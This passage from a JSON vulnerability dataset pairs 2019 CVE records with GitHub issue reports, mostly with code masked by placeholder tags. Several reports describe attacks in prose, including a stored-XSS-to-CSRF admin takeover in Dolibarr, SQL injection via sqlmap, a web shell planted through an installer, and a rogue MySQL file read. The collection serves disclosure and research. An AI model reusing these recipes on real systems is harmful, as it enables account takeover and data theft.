  37579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37580. "severity": "HIGH",
  37581. "baseScore": 8.8,
  37582. "impactScore": 5.9,
  37583. "exploitabilityScore": 2.8
  37584. },
  37585. {
  37586. "CVE_ID": "CVE-2019-14691",
  37587. "Issue_Url_old": "https://github.com/adplug/adplug/issues/86",
  37588. "Issue_Url_new": "https://github.com/adplug/adplug/issues/86",
  37589. "Repo_new": "adplug/adplug",
  37590. "Issue_Created_At": "2019-08-06T09:55:10Z",
  37591. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/dtm.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  37592. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37593. "severity": "HIGH",
  37594. "baseScore": 8.8,
  37595. "impactScore": 5.9,
  37596. "exploitabilityScore": 2.8
  37597. },
  37598. {
  37599. "CVE_ID": "CVE-2019-14692",
  37600. "Issue_Url_old": "https://github.com/adplug/adplug/issues/87",
  37601. "Issue_Url_new": "https://github.com/adplug/adplug/issues/87",
  37602. "Repo_new": "adplug/adplug",
  37603. "Issue_Created_At": "2019-08-06T09:55:15Z",
  37604. "description": "Heap based buffer overflow in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found a heap based buffer overflow in APITAG in src/mkj.cpp L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it): FILETAG ERRORTAG",
  37605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37606. "severity": "HIGH",
  37607. "baseScore": 8.8,
  37608. "impactScore": 5.9,
  37609. "exploitabilityScore": 2.8
  37610. },
  37611. {
  37612. "CVE_ID": "CVE-2019-14731",
  37613. "Issue_Url_old": "https://github.com/easysoft/zentaopms/issues/35",
  37614. "Issue_Url_new": "https://github.com/easysoft/zentaopms/issues/35",
  37615. "Repo_new": "easysoft/zentaopms",
  37616. "Issue_Created_At": "2019-08-05T14:59:11Z",
  37617. "description": "There is one XSS(stored) vulnerability that can get Cookies from other account. There exists XSS(stored) vulnerability in Rich Text Box. The vulnerability replication process is as follows NUMBERTAG Capture packets when you add picture through Rich Text Bo NUMBERTAG Then, change raw data into ERRORTAG NUMBERTAG After successful saving\uff0cusers' cookies will pop up.",
  37618. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37619. "severity": "MEDIUM",
  37620. "baseScore": 5.4,
  37621. "impactScore": 2.7,
  37622. "exploitabilityScore": 2.3
  37623. },
  37624. {
  37625. "CVE_ID": "CVE-2019-14732",
  37626. "Issue_Url_old": "https://github.com/adplug/adplug/issues/88",
  37627. "Issue_Url_new": "https://github.com/adplug/adplug/issues/88",
  37628. "Repo_new": "adplug/adplug",
  37629. "Issue_Created_At": "2019-08-06T11:11:24Z",
  37630. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/a2m.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37632. "severity": "HIGH",
  37633. "baseScore": 8.8,
  37634. "impactScore": 5.9,
  37635. "exploitabilityScore": 2.8
  37636. },
  37637. {
  37638. "CVE_ID": "CVE-2019-14733",
  37639. "Issue_Url_old": "https://github.com/adplug/adplug/issues/89",
  37640. "Issue_Url_new": "https://github.com/adplug/adplug/issues/89",
  37641. "Repo_new": "adplug/adplug",
  37642. "Issue_Created_At": "2019-08-06T11:58:03Z",
  37643. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/rad.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37645. "severity": "HIGH",
  37646. "baseScore": 8.8,
  37647. "impactScore": 5.9,
  37648. "exploitabilityScore": 2.8
  37649. },
  37650. {
  37651. "CVE_ID": "CVE-2019-14734",
  37652. "Issue_Url_old": "https://github.com/adplug/adplug/issues/90",
  37653. "Issue_Url_new": "https://github.com/adplug/adplug/issues/90",
  37654. "Repo_new": "adplug/adplug",
  37655. "Issue_Created_At": "2019-08-06T12:40:29Z",
  37656. "description": "Multiple heap based buffer overflows in APITAG Hi, While fuzzing APITAG with American Fuzzy Lop, I found multiple heap based buffer overflows in APITAG in src/mtk.cpp L NUMBERTAG and L NUMBERTAG Attaching reproducers for both issues (gzipped so APITAG accepts them): FILETAG FILETAG ERRORTAG ERRORTAG",
  37657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37658. "severity": "HIGH",
  37659. "baseScore": 8.8,
  37660. "impactScore": 5.9,
  37661. "exploitabilityScore": 2.8
  37662. },
  37663. {
  37664. "CVE_ID": "CVE-2019-14746",
  37665. "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/2",
  37666. "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/2",
  37667. "Repo_new": "poropro/kuaifan",
  37668. "Issue_Created_At": "2019-07-24T08:40:24Z",
  37669. "description": "Insert malicious code in the installation process to get a web shell. PATHTAG NUMBERTAG CODETAG it's easy to find that when we write db's config into FILETAG ,we didn't do any filtering. What's more,we use the APITAG ,so we can control all variables in this page. and this is the payload: FILETAG we can see the caches/config.php FILETAG we visit that page FILETAG",
  37670. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37671. "severity": "CRITICAL",
  37672. "baseScore": 9.8,
  37673. "impactScore": 5.9,
  37674. "exploitabilityScore": 3.9
  37675. },
  37676. {
  37677. "CVE_ID": "CVE-2019-14747",
  37678. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/47",
  37679. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/47",
  37680. "Repo_new": "wkeyuan/dwsurvey",
  37681. "Issue_Created_At": "2019-08-07T04:26:10Z",
  37682. "description": "FILETAG FILETAG",
  37683. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37684. "severity": "MEDIUM",
  37685. "baseScore": 6.1,
  37686. "impactScore": 2.7,
  37687. "exploitabilityScore": 2.8
  37688. },
  37689. {
  37690. "CVE_ID": "CVE-2019-14809",
  37691. "Issue_Url_old": "https://github.com/golang/go/issues/29098",
  37692. "Issue_Url_new": "https://github.com/golang/go/issues/29098",
  37693. "Repo_new": "golang/go",
  37694. "Issue_Created_At": "2018-12-04T17:21:41Z",
  37695. "description": "Net/URL: APITAG Multiple Parsing Issues. APITAG What version of Go are you using ( go version )? APITAG $ go version go version APITAG windows/amd NUMBERTAG APITAG Does this issue reproduce with the latest release? Yes What operating system and processor architecture are you using ( go env )? APITAG APITAG APITAG go env APITAG Output APITAG APITAG APITAG $ go env set GOARCH=amd NUMBERTAG set GOBIN= set PATHTAG set FILETAG set GOFLAGS= set GOHOSTARCH=amd NUMBERTAG set GOHOSTOS=windows set GOOS=windows set PATHTAG set GOPROXY= set GORACE= set GOROOT=C:\\Go set GOTMPDIR= set PATHTAG set GCCGO=gccgo set CC=gcc set CXX=g++ set CGO_ENABLED NUMBERTAG set GOMOD= set CGO_CFLAGS= g O2 set CGO_CPPFLAGS= set CGO_CXXFLAGS= g O2 set CGO_FFLAGS= g O2 set CGO_LDFLAGS= g O2 set PKG_CONFIG=pkg config set GOGCCFLAGS= m NUMBERTAG mthreads fno caret diagnostics Qunused arguments fmessage length NUMBERTAG PATHTAG gno record gcc switches APITAG APITAG What did you do? APITAG While playing around with APITAG I found a few problems I'd like to share. I'll gladly share more details if anything is unclear or if someone is interested. Normally, APITAG when parsed by APITAG has no APITAG But APITAG has a hostname of APITAG This can be taken further... APITAG has a hostname of APITAG and will pop an alert if relocated to by a browser (after decoding) IP NUMBERTAG support also has it's issues... this URL APITAG has the hostname of APITAG But also do all of these: APITAG APITAG APITAG Even without thinking about how this would interact with other systems and parsers, Just considering code used URL hostname validations and Go's https functions ( APITAG for instance) leveraging APITAG should explain how this could be used maliciously. Again, will be glad to provide more details if needed. All POCs can be found here URLTAG What did you expect to see? Errors for most of it... What did you see instead? Hostnames",
  37696. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37697. "severity": "CRITICAL",
  37698. "baseScore": 9.8,
  37699. "impactScore": 5.9,
  37700. "exploitabilityScore": 3.9
  37701. },
  37702. {
  37703. "CVE_ID": "CVE-2019-14859",
  37704. "Issue_Url_old": "https://github.com/warner/python-ecdsa/issues/114",
  37705. "Issue_Url_new": "https://github.com/tlsfuzzer/python-ecdsa/issues/114",
  37706. "Repo_new": "tlsfuzzer/python-ecdsa",
  37707. "Issue_Created_At": "2019-09-25T19:03:04Z",
  37708. "description": "Inconsistent handling of malformed DER signatures. When the DER signature is malformed, the APITAG raises unexpected exceptions and in some cases does not raise any exception. ERRORTAG , ERRORTAG and ERRORTAG are raised in addition to ERRORTAG , at the same time flipping the NUMBERTAG th or NUMBERTAG th least significant bit of NUMBERTAG nd byte of a NIST NUMBERTAG p signature does not cause it to be rejected (the DER encoding is strict, and every value has one defined encoding, any other encoding is invalid and needs to be rejected)",
  37709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  37710. "severity": "CRITICAL",
  37711. "baseScore": 9.1,
  37712. "impactScore": 5.2,
  37713. "exploitabilityScore": 3.9
  37714. },
  37715. {
  37716. "CVE_ID": "CVE-2019-14864",
  37717. "Issue_Url_old": "https://github.com/ansible/ansible/issues/63522",
  37718. "Issue_Url_new": "https://github.com/ansible/ansible/issues/63522",
  37719. "Repo_new": "ansible/ansible",
  37720. "Issue_Created_At": "2019-10-15T19:52:04Z",
  37721. "description": "Sumologic callback plugin logging sensitive data. SUMMARY The sumologic plugin logs sensitive data because no_log is not respected for arguments/vars passed to modules via the APITAG object ISSUE TYPE Bug Report COMPONENT NAME code where ansible_task is defined: URLTAG ANSIBLE VERSION CODETAG CONFIGURATION CODETAG OS / ENVIRONMENT APITAG NUMBERTAG STEPS TO REPRODUCE Configure a APITAG endpoint and add configuration to ansible.cfg you can find an example of our callback configs above. Below we are using a custom module, but this also happens with every other module we've tested. The module we wrote, inventory_node, has no_log: True specified on the api_key argument. This also happens if no_log: true is passed to any task. yaml name: create node in inventory via inventory_node module delegate_to: localhost connection: local inventory_node: node_name: \"{{ inventory_hostname }}\" internal_ip: \"{{ internal_ip }}\" role_id: \"{{ role_id }}\" datacenter_id: \"{{ datacenter_id }}\" cluster: \"{{ cluster | default(omit) }}\" instance_id: \"{{ instance_id | default(omit) }}\" api_key: \"{{ inventory_api_key }}\" state: present EXPECTED RESULTS I would expect that we not see the api key show up in APITAG ACTUAL RESULTS We see the api key show up in our APITAG logs. Below is the full JSON payload that is sent and received. The APITAG object correctly removes the sensitive field, but APITAG object does not. ERRORTAG",
  37722. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  37723. "severity": "MEDIUM",
  37724. "baseScore": 6.5,
  37725. "impactScore": 3.6,
  37726. "exploitabilityScore": 2.8
  37727. },
  37728. {
  37729. "CVE_ID": "CVE-2019-14892",
  37730. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2462",
  37731. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2462",
  37732. "Repo_new": "fasterxml/jackson-databind",
  37733. "Issue_Created_At": "2019-09-19T06:22:53Z",
  37734. "description": "new gadgets which can cause RCE. Hey, buddy. I notice total NUMBERTAG gadgets can be used to exploit fastjson which can cause RCE. Some of these may works for jackson as well. Please analysis these gadgets. PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG",
  37735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37736. "severity": "CRITICAL",
  37737. "baseScore": 9.8,
  37738. "impactScore": 5.9,
  37739. "exploitabilityScore": 3.9
  37740. },
  37741. {
  37742. "CVE_ID": "CVE-2019-14893",
  37743. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2469",
  37744. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2469",
  37745. "Repo_new": "fasterxml/jackson-databind",
  37746. "Issue_Created_At": "2019-09-20T06:20:34Z",
  37747. "description": "Block one more gadget type (xalan2). Another gadget ( ) type report regarding a class of xalan . Mitre id: not yet allocated Reporter: MENTIONTAG (via NUMBERTAG originally) ( ) See URLTAG for more on general problem type",
  37748. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37749. "severity": "CRITICAL",
  37750. "baseScore": 9.8,
  37751. "impactScore": 5.9,
  37752. "exploitabilityScore": 3.9
  37753. },
  37754. {
  37755. "CVE_ID": "CVE-2019-14924",
  37756. "Issue_Url_old": "https://github.com/swisspol/GCDWebServer/issues/433",
  37757. "Issue_Url_new": "https://github.com/swisspol/gcdwebserver/issues/433",
  37758. "Repo_new": "swisspol/gcdwebserver",
  37759. "Issue_Created_At": "2019-08-07T15:27:55Z",
  37760. "description": "Security issue of APITAG The method APITAG in APITAG class checks the APITAG of APITAG but not the APITAG By taking this error, adversary can make un accessible file to be available, credential of the app for instance. I have found real app affected by this vulnerability.",
  37761. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  37762. "severity": "HIGH",
  37763. "baseScore": 7.5,
  37764. "impactScore": 3.6,
  37765. "exploitabilityScore": 3.9
  37766. },
  37767. {
  37768. "CVE_ID": "CVE-2019-14933",
  37769. "Issue_Url_old": "https://github.com/bagisto/bagisto/issues/750",
  37770. "Issue_Url_new": "https://github.com/bagisto/bagisto/issues/750",
  37771. "Repo_new": "bagisto/bagisto",
  37772. "Issue_Created_At": "2019-03-27T13:23:39Z",
  37773. "description": "Cross site request forgery . Vulnerable link: URLTAG What is CSRF ? A CSRF attack forces a logged on victims browser to send a forged HTTP request, including the victims session cookie and any other automatically included authentication information, to a vulnerable web application. Vulnerable Page: Admin Panel menu FILETAG Task: To remove items from table without account owner consent. How to detect the vulnerability? It is fairly easy to detect csrf vulnerability via automated tools or code analysis. Here, we will directly look at the href urls of the Delete button which submits value without csrf token using inspect element in the browser. How to reproduce the attack? Step1: Admin (victim) signs into Bagisto admin panel and does not sign off or doesn't close browser. Step2: Admin (victim) opens tab (attacker controlled website with auto load request containing information the attacker wants to delete), details of request sent to bagisto server, auto loads evil script to delete items from the list. Step3: Browser executes evil script on attackers behalf and updates the list. Malicious page containing evil script to edit list NUMBERTAG Delete users on admin panel: No csrf token used on customer delete button. The attacker needs to send a link to page containing below code which will be executed when opened in victims browser. CODETAG NUMBERTAG Deleting review on admin panel: URLTAG NUMBERTAG deleting group: URLTAG NUMBERTAG Locales: URLTAG NUMBERTAG Currencies: URLTAG NUMBERTAG Exchange rates: URLTAG NUMBERTAG Inventory sources: URLTAG NUMBERTAG channels: URLTAG NUMBERTAG Users: URLTAG NUMBERTAG Sliders: URLTAG Impacts of vulnerability: Using this flaw an attacker can remove important functionality of the application which results into denial of most of the services on the store. Prevention Cheat sheet for developers: FILETAG URLTAG",
  37774. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37775. "severity": "HIGH",
  37776. "baseScore": 8.8,
  37777. "impactScore": 5.9,
  37778. "exploitabilityScore": 2.8
  37779. },
  37780. {
  37781. "CVE_ID": "CVE-2019-14939",
  37782. "Issue_Url_old": "https://github.com/mysqljs/mysql/issues/2257",
  37783. "Issue_Url_new": "https://github.com/mysqljs/mysql/issues/2257",
  37784. "Repo_new": "mysqljs/mysql",
  37785. "Issue_Created_At": "2019-08-10T14:49:53Z",
  37786. "description": "LOAD DATA LOCAL INFILE option shouldn't be open by default.. impact This may cause arbitrary file read vulnerability. how to do This is my client code: ERRORTAG Use this rogue mysql tool URLTAG on my server. We can just read any file from my computer. FILETAG Although it throws an error, it doesn't matter. how to fix I'm not familiar with source code. But just turn off the LOAD DATA LOCAL INFILE option by default.",
  37787. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  37788. "severity": "MEDIUM",
  37789. "baseScore": 5.5,
  37790. "impactScore": 3.6,
  37791. "exploitabilityScore": 1.8
  37792. },
  37793. {
  37794. "CVE_ID": "CVE-2019-14968",
  37795. "Issue_Url_old": "https://github.com/peacexie/imcat/issues/2",
  37796. "Issue_Url_new": "https://github.com/peacexie/imcat/issues/2",
  37797. "Repo_new": "peacexie/imcat",
  37798. "Issue_Created_At": "2019-08-06T03:03:00Z",
  37799. "description": "the vulnerability report: sql injection vulnerability in FILETAG page . . Exploit vulnerability \uff1a Use sqlmap( URLTAG and use sqlmap tamper : unmagicquotes payload: ERRORTAG FILETAG ERRORTAG GET databases; FILETAG Build install imcat and test vuln: FILETAG FILETAG FILETAG The Vuln src code: FILETAG because php code set database charset=GBK so bypass addslashes or GPC . Safetity up NUMBERTAG mysql database charset UTF NUMBERTAG Checking http input(GET/POST) data fiter dangerous that.",
  37800. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37801. "severity": "CRITICAL",
  37802. "baseScore": 9.8,
  37803. "impactScore": 5.9,
  37804. "exploitabilityScore": 3.9
  37805. },
  37806. {
  37807. "CVE_ID": "CVE-2019-14976",
  37808. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/71",
  37809. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/71",
  37810. "Repo_new": "idreamsoft/iCMS",
  37811. "Issue_Created_At": "2019-08-01T20:28:45Z",
  37812. "description": "iCMS NUMBERTAG reflected XSS. FILETAG POC APITAG FILETAG",
  37813. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37814. "severity": "MEDIUM",
  37815. "baseScore": 6.1,
  37816. "impactScore": 2.7,
  37817. "exploitabilityScore": 2.8
  37818. },
  37819. {
  37820. "CVE_ID": "CVE-2019-14980",
  37821. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick6/issues/43",
  37822. "Issue_Url_new": "https://github.com/imagemagick/imagemagick6/issues/43",
  37823. "Repo_new": "imagemagick/imagemagick6",
  37824. "Issue_Created_At": "2019-04-22T02:28:38Z",
  37825. "description": "Use after free in magick/blob.c. In magick/blob.c line NUMBERTAG the function APITAG freed the object 'blob_info >data', but it did't set the point null. The code returned this dangling point in line NUMBERTAG it will cause UAF in this code.",
  37826. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37827. "severity": "MEDIUM",
  37828. "baseScore": 6.5,
  37829. "impactScore": 3.6,
  37830. "exploitabilityScore": 2.8
  37831. },
  37832. {
  37833. "CVE_ID": "CVE-2019-14981",
  37834. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1552",
  37835. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1552",
  37836. "Repo_new": "imagemagick/imagemagick",
  37837. "Issue_Created_At": "2019-04-18T06:16:56Z",
  37838. "description": "DIVIDE_BY_ZERO in feature.c. APITAG In line NUMBERTAG it assgin 'count NUMBERTAG the code make a loop as 'for (v=( ((ssize_t) height NUMBERTAG ssize_t) height NUMBERTAG the 'count++' in this loop and the APITAG in line NUMBERTAG But the count is NUMBERTAG in some cases. It may happen DIVIDE_BY_ZERO case if the code don't get in this loop.",
  37839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37840. "severity": "MEDIUM",
  37841. "baseScore": 6.5,
  37842. "impactScore": 3.6,
  37843. "exploitabilityScore": 2.8
  37844. },
  37845. {
  37846. "CVE_ID": "CVE-2019-14982",
  37847. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/960",
  37848. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/960",
  37849. "Repo_new": "exiv2/exiv2",
  37850. "Issue_Created_At": "2019-07-15T02:53:48Z",
  37851. "description": "buffer overflow in PATHTAG Describe the bug I found a buffer overflow bugs in PATHTAG due to integer overflow. To Reproduce Steps to reproduce the behaviour: PATHTAG APITAG Expected behavior In APITAG integer overflow occurs when data_size is less than header_size, and it will cause buffer overflow in '&data FILETAG ERRORTAG The poc is here: Just do PATHTAG APITAG FILETAG",
  37852. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  37853. "severity": "MEDIUM",
  37854. "baseScore": 6.5,
  37855. "impactScore": 3.6,
  37856. "exploitabilityScore": 2.8
  37857. },
  37858. {
  37859. "CVE_ID": "CVE-2019-14993",
  37860. "Issue_Url_old": "https://github.com/envoyproxy/envoy/issues/7728",
  37861. "Issue_Url_new": "https://github.com/envoyproxy/envoy/issues/7728",
  37862. "Repo_new": "envoyproxy/envoy",
  37863. "Issue_Created_At": "2019-07-26T00:42:53Z",
  37864. "description": "route regex match fails for large URIs. Title : route regex match fails for large URIs Description : >We've noticed that requests with a very long URI crashes our envoy service for routes defined using a regex matcher. We're not sure if it's due to some overflow bug in Envoy's regex parser, but ideally Envoy should not crash because of a long URI. Repro steps : > Define a route with a match regex like the following: APITAG and then make a request with a large URI: APITAG We've gotten around it by using a prefix matcher instead, but this appears to be a potential APITAG vulnerability if not a security issue.",
  37865. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  37866. "severity": "HIGH",
  37867. "baseScore": 7.5,
  37868. "impactScore": 3.6,
  37869. "exploitabilityScore": 3.9
  37870. },
  37871. {
  37872. "CVE_ID": "CVE-2019-15052",
  37873. "Issue_Url_old": "https://github.com/gradle/gradle/issues/10278",
  37874. "Issue_Url_new": "https://github.com/gradle/gradle/issues/10278",
  37875. "Repo_new": "gradle/gradle",
  37876. "Issue_Created_At": "2019-08-14T19:06:06Z",
  37877. "description": "DISCUSSION] CVETAG : Repository authentication sent to server of HTTP redirection response. This issue is to discuss [ CVETAG URLTAG and answer any questions that people may have. Our official advisory can be found here: URLTAG Below is the contents of the original vulnerability disclosure reported by MENTIONTAG Expected Behavior If basic authentication is configured for a Maven repository credentials are only sent to the hostname configured. Current Behavior If the Maven repository responds with an HTTP redirection response (e.g. PATHTAG ) to a different hostname Gradle _includes_ the basic authorization header. Some may consider this an information disclosure security issue. Context Some Maven repositories may perform HTTP redirects to serve large binaries from via a CDN; an example of this is Artifactory's Direct Cloud Storage Download URLTAG feature. This Artifactory feature ultimately uses a S3 signed URL as a HTTP redirect. However the S3 request fails because there is authorization in the URL and Gradle sends the _unrelated_ basic authentication header. Steps to Reproduce I have created a full working example of this issue: Clone URLTAG Execute APITAG Build will fail with a APITAG response error The underlaying cause of the NUMBERTAG error is slightly difficult to diagnose because Gradle does not output the text of the response, so I'm including screen shots of the request and responses using a local HTTP proxy. APITAG Request and response to my _fake_ Maven repository: APITAG APITAG Request and response to S3 URL. Note the actual bug is that the header APITAG is being sent to the server APITAG . APITAG APITAG Environment Sample project is configured to use the latest Gradle release NUMBERTAG Please feel free to leave any questions you may have below. Please report any new security vulnerabilities to FILETAG .",
  37878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37879. "severity": "CRITICAL",
  37880. "baseScore": 9.8,
  37881. "impactScore": 5.9,
  37882. "exploitabilityScore": 3.9
  37883. },
  37884. {
  37885. "CVE_ID": "CVE-2019-15058",
  37886. "Issue_Url_old": "https://github.com/nothings/stb/issues/790",
  37887. "Issue_Url_new": "https://github.com/nothings/stb/issues/790",
  37888. "Repo_new": "nothings/stb",
  37889. "Issue_Created_At": "2019-08-13T08:52:36Z",
  37890. "description": "heap buffer overflow in stbi__tga_load with version NUMBERTAG I find heap buffer overflow in stbi__tga_load with lastest version NUMBERTAG POC: ERRORTAG In command: APITAG Output: ERRORTAG Analyze this bug: In this poc,when the program call stbi__tga_load: ERRORTAG It will call malloc NUMBERTAG because of specific data finally but after: CODETAG So it will read tga_palette[pal_idx+j] which leads to heap buffer overflow This may lead to the leak of the uninitialized data on the heap and so on......",
  37891. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  37892. "severity": "CRITICAL",
  37893. "baseScore": 9.1,
  37894. "impactScore": 5.2,
  37895. "exploitabilityScore": 3.9
  37896. },
  37897. {
  37898. "CVE_ID": "CVE-2019-15062",
  37899. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/11671",
  37900. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/11671",
  37901. "Repo_new": "dolibarr/dolibarr",
  37902. "Issue_Created_At": "2019-08-09T10:21:02Z",
  37903. "description": "Stored XSS > CSRF > Admin Account Takeover. Bug Hello Team, Dolibar NUMBERTAG alpha suffers from a Stored XSS in the Label field of Link a new file/document in Linked Files of the User. An attacker could use this feature to introduce a CSRF which would completely takeover admin's account. The protection for CSRF is restricted to referrer header and so if a CSRF request is stored inside the application, this feature is bypassed leading to change of account details. Moving to XSS, the various protections do just display an error message when certain keywords forming an XSS payload. This can be easily bypassed by using an object tag with base NUMBERTAG encoding our payload inside it. For to convert the XSS to CSRF, i'm using the iframe tag inside the object tag to load my CSRF request in its src attribute. How to takeover admin account? A request is sent to FILETAG where various details of admin can be changed i.e id NUMBERTAG The attacker just needs the login username of the admin with some random values in firstname and lastname to successfully submit a request. In this request password of admin can be changed, because it does'nt have field to enter previous password for validation. Hence it can be used to submit new password for admin and hence taking over admin account. Environment Version NUMBERTAG alpha OS : Windows NT IN NUMBERTAG L NUMBERTAG build NUMBERTAG APITAG NUMBERTAG AMD NUMBERTAG Web server : APITAG APITAG APITAG PHP NUMBERTAG PHP NUMBERTAG Database : APITAG or APITAG NUMBERTAG APITAG URL(s) : URLTAG > XSS/CSRF FILETAG > CSRF request sent to this URL Expected and actual behavior Expected behaviour: The application should block insertion of tags in pages which would lead to these issues. Actual behaviuor: The application doesn't block tags and hence leads to XSS/CSRF Steps to reproduce the behavior NUMBERTAG Login to user account as we will send a request from user to admin, just to show severity of impact. Here i'm logging into user asd and go to user card and click on Linked APITAG Tab FILETAG NUMBERTAG You will see that a user cannot add the Link a new file/document. To bypass this just open inspect element and hover to LINK box. FILETAG NUMBERTAG Now remove the value disabled=\"\" from the tag. The link will now be activated. FILETAG NUMBERTAG Now add the value asdasd.com to URL and APITAG in the Label This is an iframe with source as a csrf file. APITAG is the payload which is base NUMBERTAG encoded. You can add any source like upload it to your server as FILETAG . A new file will be added on behalf of user. FILETAG NUMBERTAG Add the following code as FILETAG ERRORTAG NUMBERTAG Now the attack vector is set. Now only the attacker needs to open the linked files page for the user. Login with admin user and head to all users > asdasd asd. FILETAG As you can see in image FILETAG the admin firstname and lastname is admin admin. Now lets open the user asdasd asd. Head to Users & Groups tab > Click on user asdasd asd APITAG FILETAG Head to Linked files of user. FILETAG If you will see that the iframe is seen on the webpage which executes our CSRF succcessfullly changing the details of admin NUMBERTAG Now open admin profile again. You will see the name has changed to hacked asd. The attacker can even change the password of the admin and takeover his account. In this case I have changed the password of admin to admin NUMBERTAG FILETAG Suggested steps In most situations where user controllable data is copied into application responses, cross site scripting attacks can be prevented using two layers of defenses NUMBERTAG Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well defined regular expression. Input which fails the validation should be rejected, not sanitized NUMBERTAG User input should be HTML encoded at any point where it is copied into application responses. All HTML metacharacters, including < > \" ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non trivial task. Here the xss protection is by using blacklist. Please don't use that, instead use the above mentioned approach",
  37904. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
  37905. "severity": "HIGH",
  37906. "baseScore": 8.0,
  37907. "impactScore": 5.9,
  37908. "exploitabilityScore": 2.1
  37909. },
  37910. {
  37911. "CVE_ID": "CVE-2019-15095",
  37912. "Issue_Url_old": "https://github.com/wkeyuan/DWSurvey/issues/48",
  37913. "Issue_Url_new": "https://github.com/wkeyuan/dwsurvey/issues/48",
  37914. "Repo_new": "wkeyuan/dwsurvey",
  37915. "Issue_Created_At": "2019-08-13T11:38:03Z",
  37916. "description": "[security vulnerability] Reflective XSS when view the survey result. There is a Reflective XSS vulnerability when user view the survey result. The failure of the XSS filter to work properly resulted in this vulnerability\uff0c which allows remote attackers to inject arbitrary web script or stole admin's or other users cookies. The impact of the problem is serious especially when combined with CSRF vulnerability exploitation. Vulnerability file: PATHTAG APITAG PATHTAG ('XSS');</script NUMBERTAG",
  37917. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37918. "severity": "MEDIUM",
